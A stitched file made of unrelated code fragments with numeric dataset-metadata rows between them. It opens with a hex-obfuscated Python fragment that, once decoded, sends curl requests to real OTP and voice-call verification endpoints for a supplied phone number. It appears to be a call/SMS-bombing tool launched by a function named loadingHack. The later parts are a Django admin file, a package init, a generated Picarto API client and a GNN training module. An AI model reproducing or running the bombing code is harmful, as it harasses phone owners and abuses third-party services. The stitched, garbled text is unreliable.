x77\x77\x2e\x6f\x6c\x78\x2e\x69\x6e\x2f\x61\x70\x69\x2f\x63\x68\x61\x6c\x6c\x65\x6e\x67\x65\x73\x22\x20\x3e\x2f\x64\x65\x76\x2f\x6e\x75\x6c\x6c\x20\x32\x3e\x26\x31\x27\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x74\x75\x72\x6e\x20\x54\x72\x75\x65\x0a\x20\x20\x20\x20\x65\x6c\x69\x66\x20\x6c\x69\x6d\x20\x3d\x3d\x20\x31\x30\x34\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x72\x64\x20\x3d\x20\x6f\x73\x2e\x70\x6f\x70\x65\x6e\x28\x27\x63\x75\x72\x6c\x20\x2d\x73\x20\x2d\x58\x20\x47\x45\x54\x20\x2d\x48\x20\x22\x48\x6f\x73\x74\x3a\x61\x70\x69\x2e\x6d\x61\x67\x69\x63\x62\x72\x69\x63\x6b\x73\x2e\x63\x6f\x6d\x22\x20\x2d\x48\x20\x22\x43\x6f\x6e\x6e\x65\x63\x74\x69\x6f\x6e\x3a\x6b\x65\x65\x70\x2d\x61\x6c\x69\x76\x65\x22\x20\x2d\x48\x20\x22\x55\x73\x65\x72\x2d\x41\x67\x65\x6e\x74\x3a\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x58\x31\x31\x3b\x20\x4c\x69\x6e\x75\x78\x20\x78\x38\x36\x5f\x36\x34\x29\x20\x41\x70\x70\x6c\x65\x57\x65\x62\x4b\x69\x74\x2f\x35\x33\x37\x2e\x33\x36\x20\x28\x4b\x48\x54\x4d\x4c\x2c\x20\x6c\x69\x6b\x65\x20\x47\x65\x63\x6b\x6f\x29\x20\x43\x68\x72\x6f\x6d\x65\x2f\x37\x35\x2e\x30\x2e\x33\x37\x37\x30\x2e\x38\x39\x20\x53\x61\x66\x61\x72\x69\x2f\x35\x33\x37\x2e\x33\x36\x22\x20\x2d\x48\x20\x22\x53\x61\x76\x65\x2d\x44\x61\x74\x61\x3a\x6f\x6e\x22\x20\x2d\x48\x20\x22\x41\x63\x63\x65\x70\x74\x3a\x69\x6d\x61\x67\x65\x2f\x77\x65\x62\x70\x2c\x69\x6d\x61\x67\x65\x2f\x61\x70\x6e\x67\x2c\x69\x6d\x61\x67\x65\x2f\x2a\x2c\x2a\x2f\x2a\x3b\x71\x3d\x30\x2e\x38\x22\x20\x2d\x48\x20\x22\x41\x63\x63\x65\x70\x74\x2d\x45\x6e\x63\x6f\x64\x69\x6e\x67\x3a\x67\x7a\x69\x70\x2c\x20\x64\x65\x66\x6c\x61\x74\x65\x2c\x20\x62\x72\x22\x20\x2d\x48\x20\x22\x41\x63\x63\x65\x70\x74\x2d\x4c\x61\x6e\x67\x75\x61\x67\x65\x3a\x65\x6e\x2d\x49\x4e\x2c\x65\x6e\x3b\x71\x3d\x30\x2e\x39\x2c\x65\x6e\x2d\x47\x42\x3b\x71\x3d\x30\x2e\x38\x2c\x65\x6e\x2d\x55\x53\x3b\x71\x3d\x30\x2e\x37\x2c\x68\x69\x3b\x71\x3d\x30\x2e\x36\x22\x20\x22\x68\x74\x74\x70\x73\x3a\x2f\x2f\x61\x70\x69\x2e\x6d\x61\x67\x69\x63\x62\x72\x69\x63\x6b\x73\x2e\x63\x6f\x6d\x2f\x62\x72\x69\x63\x6b\x73\x2f\x76\x65\x72\x69\x66\x79\x4f\x6e\x43\x61\x6c\x6c\x2e\x68\x74\x6d\x6c\x3f\x6d\x6f\x62\x69\x6c\x65\x3d\x27\x20\x2b\x20\x70\x6e\x20\x2b\x20\x27\x22\x27\x29\x2e\x72\x65\x61\x64\x28\x29\x2e\x64\x65\x63\x6f\x64\x65\x28\x27\x75\x74\x66\x2d\x38\x27\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x74\x75\x72\x6e\x20\x72\x64\x2e\x6c\x6f\x77\x65\x72\x28\x29\x2e\x73\x74\x72\x69\x70\x28\x29\x2e\x66\x69\x6e\x64\x28\x27\x63\x61\x6c\x6c\x6d\x61\x64\x65\x27\x29\x20\x21\x3d\x20\x2d\x31\x0a\x20\x20\x20\x20\x65\x6c\x69\x66\x20\x6c\x69\x6d\x20\x3d\x3d\x20\x31\x30\x36\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x72\x64\x20\x3d\x20\x6f\x73\x2e\x70\x6f\x70\x65\x6e\x28\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x63\x75\x72\x6c\x20\x2d\x73\x20\x22\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x6d\x79\x75\x70\x63\x68\x61\x72\x2e\x63\x6f\x6d\x2f\x75\x73\x65\x72\x5f\x70\x72\x6f\x66\x69\x6c\x65\x2f\x72\x65\x73\x65\x6e\x64\x5f\x6f\x74\x70\x5f\x76\x69\x61\x5f\x76\x6f\x69\x63\x65\x3f\x69\x64\x3d\x27\x20\x2b\x20\x70\x6e\x20\x2b\x20\x27\x22\x27\x29\x2e\x72\x65\x61\x64\x28\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x74\x75\x72\x6e\x20\x72\x64\x2e\x66\x69\x6e\x64\x28\x22\x31\x22\x29\x20\x21\x3d\x20\x2d\x31\x0a\x20\x20\x20\x20\x72\x65\x74\x75\x72\x6e\x20\x46\x61\x6c\x73\x65
'''
file2.writelines(L)
file2.close()
if __name__=='__main__':
verCheck()
p1 = Process(target = magic())
p1.start()
p2 = Process(target = loadingHack())
p2.start()
print("\n")
#
| 1,834.842593
| 105,764
| 0.746285
| 49,100
| 198,163
| 3.01167
| 0.005356
| 0.263659
| 0.347589
| 0.399992
| 0.877023
| 0.848438
| 0.806631
| 0.790422
| 0.781407
| 0.773218
| 0
| 0.418967
| 0.004562
| 198,163
| 107
| 105,765
| 1,851.990654
| 0.330672
| 0.000469
| 0
| 0.298969
| 0
| 0.103093
| 0.986817
| 0.980264
| 0.010309
| 1
| 0
| 0
| 0
| 1
| 0.030928
| false
| 0.030928
| 0.195876
| 0
| 0.226804
| 0.103093
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 16
|
e9ef26d833beeeaca1abd582477a506db5feff38
| 195
|
py
|
Python
|
talks_keeper/admin.py
|
samitnuk/talks_keeper
|
c4911598d291edd4cd59f91ca903fbadf12bbda9
|
[
"MIT"
] | null | null | null |
talks_keeper/admin.py
|
samitnuk/talks_keeper
|
c4911598d291edd4cd59f91ca903fbadf12bbda9
|
[
"MIT"
] | null | null | null |
talks_keeper/admin.py
|
samitnuk/talks_keeper
|
c4911598d291edd4cd59f91ca903fbadf12bbda9
|
[
"MIT"
] | null | null | null |
from django.contrib import admin
from . import models
admin.site.register(models.Country)
admin.site.register(models.Company)
admin.site.register(models.Talk)
admin.site.register(models.Label)
| 21.666667
| 35
| 0.815385
| 28
| 195
| 5.678571
| 0.428571
| 0.226415
| 0.427673
| 0.578616
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.071795
| 195
| 8
| 36
| 24.375
| 0.878453
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.333333
| 0
| 0.333333
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
43fab1f4deb34e58b9dd2a9b706240a22940f038
| 175
|
py
|
Python
|
n3ml/__init__.py
|
neurom-iot/n3ml
|
39c6b50661f293d58b4b37ef613643860724bb24
|
[
"MIT"
] | 11
|
2019-03-15T17:20:54.000Z
|
2022-03-01T08:25:36.000Z
|
n3ml/__init__.py
|
neurom-iot/n3ml
|
39c6b50661f293d58b4b37ef613643860724bb24
|
[
"MIT"
] | 7
|
2019-03-15T16:02:51.000Z
|
2021-12-03T08:17:06.000Z
|
n3ml/__init__.py
|
neurom-iot/n3ml
|
39c6b50661f293d58b4b37ef613643860724bb24
|
[
"MIT"
] | 9
|
2019-10-14T12:38:19.000Z
|
2021-12-02T04:49:28.000Z
|
__all__ = [
'save', 'savez', 'load', 'to_state_dict_fpga', 'to_state_dict_loihi'
]
from .serialization import save, savez, load, to_state_dict_fpga, to_state_dict_loihi
| 25
| 85
| 0.742857
| 26
| 175
| 4.384615
| 0.461538
| 0.245614
| 0.385965
| 0.263158
| 0.77193
| 0.77193
| 0.77193
| 0.77193
| 0.77193
| 0.77193
| 0
| 0
| 0.131429
| 175
| 6
| 86
| 29.166667
| 0.75
| 0
| 0
| 0
| 0
| 0
| 0.285714
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.25
| 0
| 0.25
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
a12cf1d5b0e8a83f6907e3826f47d6f6ad0e9c03
| 18,977
|
py
|
Python
|
Contents/Libraries/Shared/PicartoClientAPI/apis/channel_api.py
|
Sythelux/Picarto.bundle
|
f2e9e9e75421b15c562c961c8c31090c508166ff
|
[
"BSD-3-Clause"
] | null | null | null |
Contents/Libraries/Shared/PicartoClientAPI/apis/channel_api.py
|
Sythelux/Picarto.bundle
|
f2e9e9e75421b15c562c961c8c31090c508166ff
|
[
"BSD-3-Clause"
] | 5
|
2018-01-29T23:18:20.000Z
|
2018-01-29T23:57:15.000Z
|
Contents/Libraries/Shared/PicartoClientAPI/apis/channel_api.py
|
Sythelux/Picarto.bundle
|
f2e9e9e75421b15c562c961c8c31090c508166ff
|
[
"BSD-3-Clause"
] | null | null | null |
# coding: utf-8
"""
Picarto.TV API Documentation
The Picarto.TV API documentation Note, for fixed access tokens, the header that needs to be sent is of the format: `Authorization: Bearer yourTokenHere` This can be generated at https://oauth.picarto.tv/ For chat API, see https://docs.picarto.tv/chat/chat.proto - contact via the email below for implementation details
OpenAPI spec version: 1.2.5
Contact: api@picarto.tv
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import sys
import os
import re
# python 2 and python 3 compatibility library
from six import iteritems
from ..configuration import Configuration
from ..api_client import ApiClient
class ChannelApi(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
config = Configuration()
if api_client:
self.api_client = api_client
else:
if not config.api_client:
config.api_client = ApiClient()
self.api_client = config.api_client
def channel_id_channel_id_get(self, channel_id, **kwargs):
"""
Gets information about a channel by ID
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.channel_id_channel_id_get(channel_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param int channel_id: Channel ID of user you wish to read (required)
:return: ChannelDetails
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.channel_id_channel_id_get_with_http_info(channel_id, **kwargs)
else:
(data) = self.channel_id_channel_id_get_with_http_info(channel_id, **kwargs)
return data
def channel_id_channel_id_get_with_http_info(self, channel_id, **kwargs):
"""
Gets information about a channel by ID
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.channel_id_channel_id_get_with_http_info(channel_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param int channel_id: Channel ID of user you wish to read (required)
:return: ChannelDetails
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['channel_id']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method channel_id_channel_id_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'channel_id' is set
if ('channel_id' not in params) or (params['channel_id'] is None):
raise ValueError("Missing the required parameter `channel_id` when calling `channel_id_channel_id_get`")
collection_formats = {}
path_params = {}
if 'channel_id' in params:
path_params['channel_id'] = params['channel_id']
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json; charset=utf-8', 'text/plain; charset=utf-8'])
# Authentication setting
auth_settings = []
return self.api_client.call_api('/channel/id/{channel_id}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ChannelDetails',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def channel_id_channel_id_videos_get(self, channel_id, **kwargs):
"""
Get all videos for a channel by id
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.channel_id_channel_id_videos_get(channel_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param int channel_id: Channel ID of the user you want to get videos for (required)
:return: ChannelVideos
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.channel_id_channel_id_videos_get_with_http_info(channel_id, **kwargs)
else:
(data) = self.channel_id_channel_id_videos_get_with_http_info(channel_id, **kwargs)
return data
def channel_id_channel_id_videos_get_with_http_info(self, channel_id, **kwargs):
"""
Get all videos for a channel by id
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.channel_id_channel_id_videos_get_with_http_info(channel_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param int channel_id: Channel ID of the user you want to get videos for (required)
:return: ChannelVideos
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['channel_id']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method channel_id_channel_id_videos_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'channel_id' is set
if ('channel_id' not in params) or (params['channel_id'] is None):
raise ValueError("Missing the required parameter `channel_id` when calling `channel_id_channel_id_videos_get`")
collection_formats = {}
path_params = {}
if 'channel_id' in params:
path_params['channel_id'] = params['channel_id']
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json; charset=utf-8', 'text/plain; charset=utf-8'])
# Authentication setting
auth_settings = []
return self.api_client.call_api('/channel/id/{channel_id}/videos', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ChannelVideos',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def channel_name_channel_name_get(self, channel_name, **kwargs):
"""
Gets information about a channel by name
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.channel_name_channel_name_get(channel_name, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str channel_name: Channel name of user you wish to read (required)
:return: ChannelDetails
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.channel_name_channel_name_get_with_http_info(channel_name, **kwargs)
else:
(data) = self.channel_name_channel_name_get_with_http_info(channel_name, **kwargs)
return data
def channel_name_channel_name_get_with_http_info(self, channel_name, **kwargs):
"""
Gets information about a channel by name
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.channel_name_channel_name_get_with_http_info(channel_name, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str channel_name: Channel name of user you wish to read (required)
:return: ChannelDetails
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['channel_name']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method channel_name_channel_name_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'channel_name' is set
if ('channel_name' not in params) or (params['channel_name'] is None):
raise ValueError("Missing the required parameter `channel_name` when calling `channel_name_channel_name_get`")
collection_formats = {}
path_params = {}
if 'channel_name' in params:
path_params['channel_name'] = params['channel_name']
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json; charset=utf-8', 'text/plain; charset=utf-8'])
# Authentication setting
auth_settings = []
return self.api_client.call_api('/channel/name/{channel_name}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ChannelDetails',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def channel_name_channel_name_videos_get(self, channel_name, **kwargs):
"""
Get all videos for a channel by name
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.channel_name_channel_name_videos_get(channel_name, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str channel_name: Channel name of the user you want to get videos for (required)
:return: ChannelVideos
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.channel_name_channel_name_videos_get_with_http_info(channel_name, **kwargs)
else:
(data) = self.channel_name_channel_name_videos_get_with_http_info(channel_name, **kwargs)
return data
def channel_name_channel_name_videos_get_with_http_info(self, channel_name, **kwargs):
"""
Get all videos for a channel by name
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.channel_name_channel_name_videos_get_with_http_info(channel_name, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str channel_name: Channel name of the user you want to get videos for (required)
:return: ChannelVideos
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['channel_name']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method channel_name_channel_name_videos_get" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'channel_name' is set
if ('channel_name' not in params) or (params['channel_name'] is None):
raise ValueError("Missing the required parameter `channel_name` when calling `channel_name_channel_name_videos_get`")
collection_formats = {}
path_params = {}
if 'channel_name' in params:
path_params['channel_name'] = params['channel_name']
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json; charset=utf-8', 'text/plain; charset=utf-8'])
# Authentication setting
auth_settings = []
return self.api_client.call_api('/channel/name/{channel_name}/videos', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ChannelVideos',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
| 42.934389
| 326
| 0.58476
| 2,029
| 18,977
| 5.200099
| 0.092164
| 0.061416
| 0.033362
| 0.037532
| 0.930528
| 0.925979
| 0.92342
| 0.913468
| 0.909487
| 0.905507
| 0
| 0.001117
| 0.339674
| 18,977
| 441
| 327
| 43.031746
| 0.840875
| 0.331717
| 0
| 0.782407
| 0
| 0
| 0.176177
| 0.054646
| 0
| 0
| 0
| 0
| 0
| 1
| 0.041667
| false
| 0
| 0.032407
| 0
| 0.134259
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
a1428cda5277485606b545bc524b82852fff8023
| 24,215
|
py
|
Python
|
matdgl/models/gnnframe.py
|
huzongxiang/CrysNetwork
|
b6772474a65ba5ae1a7942b0d2abca50168b5ffa
|
[
"BSD-2-Clause"
] | 4
|
2022-01-10T09:15:41.000Z
|
2022-01-19T04:01:29.000Z
|
matdgl/models/gnnframe.py
|
huzongxiang/CrysNetwork
|
b6772474a65ba5ae1a7942b0d2abca50168b5ffa
|
[
"BSD-2-Clause"
] | null | null | null |
matdgl/models/gnnframe.py
|
huzongxiang/CrysNetwork
|
b6772474a65ba5ae1a7942b0d2abca50168b5ffa
|
[
"BSD-2-Clause"
] | 1
|
2022-01-10T09:13:13.000Z
|
2022-01-10T09:13:13.000Z
|
# -*- coding: utf-8 -*-
"""
Created on Mon Dec 20 15:15:31 2021
@author: huzongxiang
"""
import numpy as np
from pathlib import Path
import tensorflow as tf
from tensorflow import keras
from tensorflow.keras.models import Model
from tensorflow.keras.callbacks import ModelCheckpoint, ReduceLROnPlateau, EarlyStopping
from matdgl.callbacks.cosineannealing import WarmUpCosineDecayScheduler
import matplotlib.pyplot as plt
from scipy import interp
from sklearn.metrics import roc_curve
from sklearn.metrics import auc, r2_score
ModulePath = Path(__file__).parent.absolute()
class Pretrainer:
def __init__(self,
model: Model,
atom_dim=16,
bond_dim=32,
num_atom=118,
state_dim=16,
sp_dim=230,
batch_size=16,
ntarget=1,
optimizer='Adam',
**kwargs,
):
self.model = model
self.atom_dim = atom_dim
self.bond_dim = bond_dim
self.num_atom = num_atom
self.state_dim = state_dim
self.sp_dim = sp_dim
self.batch_size = batch_size
self.ntarget = ntarget
self.optimizer = optimizer
self.gnn = model(atom_dim=atom_dim,
bond_dim=bond_dim,
num_atom=num_atom,
state_dim=state_dim,
sp_dim=sp_dim,
batch_size=batch_size,
**kwargs)
def __getattr__(self, attr):
return getattr(self.gnn, attr)
def train(self, train_data, valid_data=None, test_data=None, epochs=200, lr=1e-3, warm_up=True, warmrestart=None,
load_weights=False, patience=500, verbose=1, checkpoints=None, save_weights_only=True, workdir=None):
gnn = self.gnn
gnn.compile(
loss=tf.keras.losses.CategoricalCrossentropy(),
optimizer=self.optimizer,
metrics=[tf.keras.metrics.AUC(name="AUC")],
)
if load_weights:
print("load weights")
path = self.gnn.name + ".hdf5"
if load_weights == "default":
best_checkpoint = Path(ModulePath/"model"/path)
elif load_weights == "custom":
best_checkpoint = Path(workdir/"model"/path)
else:
raise ValueError('load_weights should be "default" or "custom"')
gnn.load_weights(best_checkpoint)
print(gnn.summary())
keras.utils.plot_model(gnn, Path(workdir/"pretrainer.png"), show_dtype=True, show_shapes=True)
print(train_data.task_type)
Path(workdir/"model").mkdir(exist_ok=True)
Path(workdir/"model"/train_data.task_type).mkdir(exist_ok=True)
if checkpoints is None:
filepath = Path(workdir/"model"/train_data.task_type/"gnn_{epoch:02d}-{val_AUC:.3f}.hdf5")
checkpoint = ModelCheckpoint(filepath, monitor='val_AUC', save_best_only=True, save_weights_only=save_weights_only, verbose=verbose, mode='max')
earlystop = EarlyStopping(monitor='val_loss', patience=patience, verbose=verbose, mode='min')
if warm_up:
sample_count = train_data.data_size
warmup_epoch = 5
train_per_epoch = sample_count / self.batch_size
warmup_steps = warmup_epoch * train_per_epoch
restart_epoches = warmrestart
warm_up_lr = WarmUpCosineDecayScheduler(epochs=epochs,
restart_epoches=restart_epoches,
train_per_epoch=train_per_epoch,
learning_rate_base=lr,
warmup_learning_rate=2e-6,
warmup_steps=warmup_steps,
hold_base_rate_steps=5,
)
checkpoints = [checkpoint, warm_up_lr, earlystop]
else:
reduce_lr = ReduceLROnPlateau(monitor='val_loss', factor=0.2, patience=50, verbose=1, min_lr=1e-6, mode='min')
checkpoints = [checkpoint, reduce_lr, earlystop]
if valid_data:
steps_per_train = int(np.ceil(train_data.data_size / self.batch_size))
steps_per_val = int(np.ceil(valid_data.data_size / self.batch_size))
else:
steps_per_train = None
steps_per_val = None
print("gnn fit")
history = gnn.fit(
train_data,
validation_data=valid_data,
steps_per_epoch=steps_per_train,
validation_steps=steps_per_val,
epochs=epochs,
verbose=verbose,
callbacks=checkpoints,
)
Path(workdir/"results").mkdir(exist_ok=True)
plot_train(history, train_data.task_type, workdir)
if warm_up:
total_steps = int(epochs * sample_count / self.batch_size)
plot_warm_up_lr(warm_up_lr, total_steps, lr, workdir)
class GNN:
def __init__(self,
model: Model,
atom_dim=16,
bond_dim=32,
num_atom=118,
state_dim=16,
sp_dim=230,
batch_size=16,
regression=True,
ntarget=1,
multiclassification=None,
optimizer='Adam',
**kwargs,
):
self.model = model
self.atom_dim = atom_dim
self.bond_dim = bond_dim
self.num_atom = num_atom
self.state_dim = state_dim
self.sp_dim = sp_dim
self.batch_size = batch_size
self.regression = regression
self.ntarget = ntarget
self.multiclassification = multiclassification
self.optimizer = optimizer
self.gnn = model(atom_dim=atom_dim,
bond_dim=bond_dim,
num_atom=num_atom,
state_dim=state_dim,
sp_dim=sp_dim,
batch_size=batch_size,
regression=regression,
multiclassification=multiclassification,
**kwargs)
def __getattr__(self, attr):
return getattr(self.gnn, attr)
def train(self, train_data, valid_data=None, test_data=None, epochs=200, lr=1e-3, warm_up=True, warmrestart=None,
load_weights=False, patience=500, verbose=1, checkpoints=None, save_weights_only=True, workdir=None):
gnn = self.gnn
if self.regression:
gnn.compile(
loss=keras.losses.MeanAbsoluteError(),
optimizer=self.optimizer,
metrics=[keras.metrics.MeanAbsoluteError(name="mae")],
)
elif self.multiclassification:
gnn.compile(
loss=tf.keras.losses.CategoricalCrossentropy(),
optimizer=self.optimizer,
metrics=[tf.keras.metrics.AUC(name="AUC")],
)
else:
gnn.compile(
loss=tf.keras.losses.BinaryCrossentropy(),
optimizer=self.optimizer,
metrics=[tf.keras.metrics.AUC(name="AUC")],
)
print(gnn.summary())
keras.utils.plot_model(gnn, Path(workdir/"gnn_arch.png"), show_dtype=True, show_shapes=True)
if load_weights:
print('load weights')
path = train_data.task_type + ".hdf5"
if load_weights == 'default':
best_checkpoint = Path(ModulePath/"model"/path)
elif load_weights == 'custom':
best_checkpoint = Path(workdir/"model"/path)
else:
raise ValueError('load_weights should be "default" or "custom"')
gnn.load_weights(best_checkpoint)
print(train_data.task_type)
Path(workdir/"model").mkdir(exist_ok=True)
Path(workdir/"model"/train_data.task_type).mkdir(exist_ok=True)
if checkpoints is None:
if self.regression:
filepath = Path(workdir/"model"/train_data.task_type/"gnn_{epoch:02d}-{val_mae:.3f}.hdf5")
checkpoint = ModelCheckpoint(filepath, monitor='val_mae', save_best_only=True, save_weights_only=save_weights_only, verbose=verbose, mode='min')
else:
filepath = Path(workdir/"model"/train_data.task_type/"gnn_{epoch:02d}-{val_AUC:.3f}.hdf5")
checkpoint = ModelCheckpoint(filepath, monitor='val_AUC', save_best_only=True, save_weights_only=save_weights_only, verbose=verbose, mode='max')
earlystop = EarlyStopping(monitor='val_loss', patience=patience, verbose=verbose, mode='min')
if warm_up:
sample_count = train_data.data_size
warmup_epoch = 5
train_per_epoch = sample_count / self.batch_size
warmup_steps = warmup_epoch * train_per_epoch
restart_epoches = warmrestart
warm_up_lr = WarmUpCosineDecayScheduler(epochs=epochs,
restart_epoches=restart_epoches,
train_per_epoch=train_per_epoch,
learning_rate_base=lr,
warmup_learning_rate=2e-6,
warmup_steps=warmup_steps,
hold_base_rate_steps=5,
)
checkpoints = [checkpoint, warm_up_lr, earlystop]
else:
reduce_lr = ReduceLROnPlateau(monitor='val_loss', factor=0.2, patience=50, verbose=1, min_lr=1e-6, mode='min')
checkpoints = [checkpoint, reduce_lr, earlystop]
if valid_data:
steps_per_train = int(np.ceil(train_data.data_size / self.batch_size))
steps_per_val = int(np.ceil(valid_data.data_size / self.batch_size))
else:
steps_per_train = None
steps_per_val = None
print("gnn fit")
history = gnn.fit(
train_data,
validation_data=valid_data,
steps_per_epoch=steps_per_train,
validation_steps=steps_per_val,
epochs=epochs,
verbose=verbose,
callbacks=checkpoints,
)
Path(workdir/"results").mkdir(exist_ok=True)
if self.regression:
plot_train_regression(history, train_data.task_type, workdir)
if test_data:
plot_mae(gnn, test_data, workdir, name='test')
else:
